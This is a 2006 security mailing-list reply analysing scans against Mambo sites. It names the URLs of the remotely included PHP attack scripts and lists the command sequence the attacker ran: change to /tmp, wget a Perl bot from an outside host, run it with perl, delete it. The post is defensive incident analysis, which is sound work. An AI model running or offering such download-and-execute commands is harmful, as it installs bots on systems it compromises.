Re: High volume of Mambo scans (perlb0t)
Peter Kosinar <[email protected]> Mon, 15 May 2006 19:26:29 +0200 (CEST)
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Hello, > I was looking at the scripts they try to download and > it does not looks like a common perl bot (connecting > to irc). It's also written in php and by a brazilian > person (comments in portuguese) and with a terrible > code :) I didn't have time to fully look at it, > though. > > These are the pages they access: > > http://usuarios.lycos.es/athos666/d25/ > http://usuarios.lycos.es/athos666/d25/therules25.dat > http://radius01.comete.ci/tool.gif Actually, the tool.gif file (and the other parts of it) is just the first level of the attack machinery -- it's _the_ PHP script which actually gets remotely included and it understands some simple commands and displays the results in nice form. In this particular case, the interesting argument is "cmd=..." which executes the given command. As you can see from the remaining portion of the request, the executed compound command in this case consisted of: 1) cd /tmp 2) wget http://radius01.comete.ci/session.gif 3) perl session.gif 4) rm -rf session.* The session.gif file is the Perlbot I and other posters mentioned. Peter -- [Name] Peter Kosinar [Quote] 2B | ~2B = exp(i*PI) [ICQ] 134813278